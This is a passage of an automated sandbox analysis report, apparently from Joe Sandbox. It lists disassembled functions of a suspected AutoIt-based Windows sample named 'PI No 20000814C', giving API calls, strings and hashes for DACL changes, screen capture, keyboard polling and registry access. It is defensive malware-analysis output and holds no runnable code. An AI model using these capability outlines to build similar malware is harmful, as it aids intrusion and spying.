                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                    • API String ID: 2698844021-4113822522
                                    • Opcode ID: b402456e3efb5a9034179eb5a2dba72eb95df6c21d7291e0608938ac24ab4068
                                    • Instruction ID: 8d3c21fc8c70608f834cf0f9f764b2a43575fa989c18da48becb7bccb0fbb3cb
                                    • Opcode Fuzzy Hash: b402456e3efb5a9034179eb5a2dba72eb95df6c21d7291e0608938ac24ab4068
                                    • Instruction Fuzzy Hash: 535149715083059FC700EF24CC8186AB7E4EF98718F04496CF896572A2DB35EE0AEF92
                                    Function 00F6A45A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00F6A47A
                                    • __swprintf.LIBCMT ref: 00F6A49C
                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00F6A4D9
                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00F6A4FE
                                    • _memset.LIBCMT ref: 00F6A51D
                                    • _wcsncpy.LIBCMT ref: 00F6A559
                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00F6A58E
                                    • CloseHandle.KERNEL32(00000000), ref: 00F6A599
                                    • RemoveDirectoryW.KERNEL32(?), ref: 00F6A5A2
                                    • CloseHandle.KERNEL32(00000000), ref: 00F6A5AC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                    • String ID: :$\$\??\%s
                                    • API String ID: 2733774712-3457252023
                                    • Opcode ID: f3f3ecdace318446fefb834152138a8d87c11d3ab5324ff5d23ab074342bae8a
                                    • Instruction ID: 0e04ff9e1d1a9660aca8f7e9fb0d4b5d53fb603b667e98de69b3e642e0b4ce10
                                    • Opcode Fuzzy Hash: f3f3ecdace318446fefb834152138a8d87c11d3ab5324ff5d23ab074342bae8a
                                    • Instruction Fuzzy Hash: 6C31A2B1900119ABDB20DFA0DC48FFB77BCEF88711F1041B6F509D2160EB749644AB25
                                    Function 00F583F4 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F5874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00F58766
                                      • Part of subcall function 00F5874A: GetLastError.KERNEL32(?,00F5822A,?,?,?), ref: 00F58770
                                      • Part of subcall function 00F5874A: GetProcessHeap.KERNEL32(00000008,?,?,00F5822A,?,?,?), ref: 00F5877F
                                      • Part of subcall function 00F5874A: RtlAllocateHeap.NTDLL(00000000,?,00F5822A), ref: 00F58786
                                      • Part of subcall function 00F5874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00F5879D
                                      • Part of subcall function 00F587E7: GetProcessHeap.KERNEL32(00000008,00F58240,00000000,00000000,?,00F58240,?), ref: 00F587F3
                                      • Part of subcall function 00F587E7: RtlAllocateHeap.NTDLL(00000000,?,00F58240), ref: 00F587FA
                                      • Part of subcall function 00F587E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00F58240,?), ref: 00F5880B
                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00F58458
                                    • _memset.LIBCMT ref: 00F5846D
                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00F5848C
                                    • GetLengthSid.ADVAPI32(?), ref: 00F5849D
                                    • GetAce.ADVAPI32(?,00000000,?), ref: 00F584DA
                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00F584F6
                                    • GetLengthSid.ADVAPI32(?), ref: 00F58513
                                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00F58522
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00F58529
                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00F5854A
                                    • CopySid.ADVAPI32(00000000), ref: 00F58551
                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00F58582
                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00F585A8
                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00F585BC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                    • String ID:
                                    • API String ID: 2347767575-0
                                    • Opcode ID: cd76ecdb4922a695f4b69439685b417dbe7514a3afc5838c65b4b60b33c6025f
                                    • Instruction ID: c3740c61e59ecbb253d513f5b0f7affa08207e0a05f3745d2e34ab54296ecfc7
                                    • Opcode Fuzzy Hash: cd76ecdb4922a695f4b69439685b417dbe7514a3afc5838c65b4b60b33c6025f
                                    • Instruction Fuzzy Hash: B5615E71900209AFDF00DF90DC45AEEBB79FF04361F148169E915B7291EB359A0AEF60
                                    Function 00F7762D Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetDC.USER32(00000000), ref: 00F776A2
                                    • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00F776AE
                                    • CreateCompatibleDC.GDI32(?), ref: 00F776BA
                                    • SelectObject.GDI32(00000000,?), ref: 00F776C7
                                    • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00F7771B
                                    • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00F77757
                                    • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00F7777B
                                    • SelectObject.GDI32(00000006,?), ref: 00F77783
                                    • DeleteObject.GDI32(?), ref: 00F7778C
                                    • DeleteDC.GDI32(00000006), ref: 00F77793
                                    • ReleaseDC.USER32(00000000,?), ref: 00F7779E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                    • String ID: (
                                    • API String ID: 2598888154-3887548279
                                    • Opcode ID: 34909322893d2328cde08602e29461668860a2b9fc54a64fd0eedb5021ce13f2
                                    • Instruction ID: f35cf4efd9dff9e6eff2d30dca5f8263e4f95c26106073dafcbc4de70d97596e
                                    • Opcode Fuzzy Hash: 34909322893d2328cde08602e29461668860a2b9fc54a64fd0eedb5021ce13f2
                                    • Instruction Fuzzy Hash: 37514975904309EFCB15DFA8CC84EAEBBB9EF48310F14852EF94A97210D731A845DB60
                                    Function 00F6A0B5 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 156COMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadStringW.USER32(00000066,?,00000FFF,00F8FB78), ref: 00F6A0FC
                                      • Part of subcall function 00F07F41: _memmove.LIBCMT ref: 00F07F82
                                    • LoadStringW.USER32(?,?,00000FFF,?), ref: 00F6A11E
                                    • __swprintf.LIBCMT ref: 00F6A177
                                    • __swprintf.LIBCMT ref: 00F6A190
                                    • _wprintf.LIBCMT ref: 00F6A246
                                    • _wprintf.LIBCMT ref: 00F6A264
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: LoadString__swprintf_wprintf$_memmove
                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                    • API String ID: 311963372-2391861430
                                    • Opcode ID: 1af159e9b12e333515a0b1ba25da7a2180e28777cb60d543b6a8e8b9317ef5d7
                                    • Instruction ID: 2c9a170264ec38c52ca91257720656abee34cd297b9919ea8064f620beb0ba71
                                    • Opcode Fuzzy Hash: 1af159e9b12e333515a0b1ba25da7a2180e28777cb60d543b6a8e8b9317ef5d7
                                    • Instruction Fuzzy Hash: 3C514D72D04209AACF15EBA0CD96EEEB779AF05700F1001A5F505720A1EB796F58FFA1
                                    Function 00F06BEC Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F20B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00F06C6C,?,00008000), ref: 00F20BB7
                                      • Part of subcall function 00F048AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F048A1,?,?,00F037C0,?), ref: 00F048CE
                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00F06D0D
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00F06E5A
                                      • Part of subcall function 00F059CD: _wcscpy.LIBCMT ref: 00F05A05
                                      • Part of subcall function 00F2387D: _iswctype.LIBCMT ref: 00F23885
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                    • API String ID: 537147316-1018226102
                                    • Opcode ID: c46805955dfe0dfd9da79b54a2641be58efa7037f58fbca6d4fceda2c4a00049
                                    • Instruction ID: f3174f8ea851a6b1fa6e0f6903782196d49b1e8ebb5bf7b46946f86310b63fcb
                                    • Opcode Fuzzy Hash: c46805955dfe0dfd9da79b54a2641be58efa7037f58fbca6d4fceda2c4a00049
                                    • Instruction Fuzzy Hash: C0029D315083419FC724EF24C881AAFBBE5BF98764F04491DF486972A1DB38E949FB42
                                    Function 00F045DF Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 00F045F9
                                    • GetMenuItemCount.USER32(00FC6890), ref: 00F3D7CD
                                    • GetMenuItemCount.USER32(00FC6890), ref: 00F3D87D
                                    • GetCursorPos.USER32(?), ref: 00F3D8C1
                                    • SetForegroundWindow.USER32(00000000), ref: 00F3D8CA
                                    • TrackPopupMenuEx.USER32(00FC6890,00000000,?,00000000,00000000,00000000), ref: 00F3D8DD
                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00F3D8E9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                    • String ID:
                                    • API String ID: 2751501086-0
                                    • Opcode ID: 3e526d18a29f6a142220520cedfb9431d86f5772b89183f4f8e9eca401d8c01e
                                    • Instruction ID: 48943694828b0d37feb2dbcb7535347220461ce776c7cf543ce14c739fbf04a9
                                    • Opcode Fuzzy Hash: 3e526d18a29f6a142220520cedfb9431d86f5772b89183f4f8e9eca401d8c01e
                                    • Instruction Fuzzy Hash: 70710771A00209BEEB219F14EC45FAAFF65FF05378F244216F615AA1E0C7B66814FB90
                                    Function 00F810A5 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                    Download Yara Rule
                                    APIs
                                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F80038,?,?), ref: 00F810BC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: BuffCharUpper
                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                    • API String ID: 3964851224-909552448
                                    • Opcode ID: f8bd50ba6270f5941499d9f2b1a1de688577fdb2a4c52bb1d4643a831fdcdce4
                                    • Instruction ID: e21ea30f95be606f6e2d5fd10b8bc7af52c2f41629e0513364debf280de616f3
                                    • Opcode Fuzzy Hash: f8bd50ba6270f5941499d9f2b1a1de688577fdb2a4c52bb1d4643a831fdcdce4
                                    • Instruction Fuzzy Hash: AF41783150125E8FDF10FF94EC95AEA3728BF11350F904664EC919B293DB74A91AFBA0
                                    Function 00F65569 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F07D2C: _memmove.LIBCMT ref: 00F07D66
                                      • Part of subcall function 00F07A84: _memmove.LIBCMT ref: 00F07B0D
                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00F655D2
                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00F655E8
                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F655F9
                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00F6560B
                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00F6561C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: SendString$_memmove
                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                    • API String ID: 2279737902-1007645807
                                    • Opcode ID: ef89638b85b9d3b66ea418f673876fd9c92ad20b24be998ffcca6d2e346781ec
                                    • Instruction ID: 0faa26b03b37c2423e82d04063de7f9344d1e10dd8a5c5b3bd6f2644627403af
                                    • Opcode Fuzzy Hash: ef89638b85b9d3b66ea418f673876fd9c92ad20b24be998ffcca6d2e346781ec
                                    • Instruction Fuzzy Hash: 8111C430E5026979D720B666CC4ADFFBBBCEF95F00F440469B401A20D1EEA66D05F9B2
                                    Function 00F648F3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                    • String ID: 0.0.0.0
                                    • API String ID: 208665112-3771769585
                                    • Opcode ID: ce0952496026b8317158d82b4d78bc8304b3f4551dc6001726d17962c3eda8d1
                                    • Instruction ID: a512983ae6c44c52438d76265d8af77770fccbdd5f4bf1efbc41e6150ff894d8
                                    • Opcode Fuzzy Hash: ce0952496026b8317158d82b4d78bc8304b3f4551dc6001726d17962c3eda8d1
                                    • Instruction Fuzzy Hash: A111C331D04129AFDB24FB24AC06EEB77BCDB01720F1401B5F44596091EF75AA85FB61
                                    Function 00F65217 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • timeGetTime.WINMM ref: 00F6521C
                                      • Part of subcall function 00F20719: timeGetTime.WINMM(?,7694B400,00F10FF9), ref: 00F2071D
                                    • Sleep.KERNEL32(0000000A), ref: 00F65248
                                    • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 00F6526C
                                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00F6528E
                                    • SetActiveWindow.USER32 ref: 00F652AD
                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00F652BB
                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00F652DA
                                    • Sleep.KERNEL32(000000FA), ref: 00F652E5
                                    • IsWindow.USER32 ref: 00F652F1
                                    • EndDialog.USER32(00000000), ref: 00F65302
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                    • String ID: BUTTON
                                    • API String ID: 1194449130-3405671355
                                    • Opcode ID: 6c76dddb48ee7af6e6d375e9bb7cfbda5535e9d094bb12c49982496298fbe52a
                                    • Instruction ID: 42f6926a419148980af8c4cb8e835e60a48e6844f218416ece588f3a4c89b911
                                    • Opcode Fuzzy Hash: 6c76dddb48ee7af6e6d375e9bb7cfbda5535e9d094bb12c49982496298fbe52a
                                    • Instruction Fuzzy Hash: 5D21967120470CAFE7006F70EE8AFB93B6AEB55B56F181424F112D3171DB659C48BB21
                                    Function 00F6052C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetKeyboardState.USER32(?), ref: 00F605A7
                                    • SetKeyboardState.USER32(?), ref: 00F60612
                                    • GetAsyncKeyState.USER32(000000A0), ref: 00F60632
                                    • GetKeyState.USER32(000000A0), ref: 00F60649
                                    • GetAsyncKeyState.USER32(000000A1), ref: 00F60678
                                    • GetKeyState.USER32(000000A1), ref: 00F60689
                                    • GetAsyncKeyState.USER32(00000011), ref: 00F606B5
                                    • GetKeyState.USER32(00000011), ref: 00F606C3
                                    • GetAsyncKeyState.USER32(00000012), ref: 00F606EC
                                    • GetKeyState.USER32(00000012), ref: 00F606FA
                                    • GetAsyncKeyState.USER32(0000005B), ref: 00F60723
                                    • GetKeyState.USER32(0000005B), ref: 00F60731
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: State$Async$Keyboard
                                    • String ID:
                                    • API String ID: 541375521-0
                                    • Opcode ID: ddc15e9b48eabec6c82eaa2c59ad98b656b993c5e5b6d612c35b7c6e735cc1e5
                                    • Instruction ID: a985e16c92ad37c9c8ae721ad447035b617db47cf1af32a584c79e853293604c
                                    • Opcode Fuzzy Hash: ddc15e9b48eabec6c82eaa2c59ad98b656b993c5e5b6d612c35b7c6e735cc1e5
                                    • Instruction Fuzzy Hash: E851E920E0478829FB35DBB088547EBBFB49F11390F1C459AD5C25B1C2DE649E8CEB61
                                    Function 00F5C72A Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetDlgItem.USER32(?,00000001), ref: 00F5C746
                                    • GetWindowRect.USER32(00000000,?), ref: 00F5C758
                                    • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00F5C7B6
                                    • GetDlgItem.USER32(?,00000002), ref: 00F5C7C1
                                    • GetWindowRect.USER32(00000000,?), ref: 00F5C7D3
                                    • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00F5C827
                                    • GetDlgItem.USER32(?,000003E9), ref: 00F5C835
                                    • GetWindowRect.USER32(00000000,?), ref: 00F5C846
                                    • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00F5C889
                                    • GetDlgItem.USER32(?,000003EA), ref: 00F5C897
                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00F5C8B4
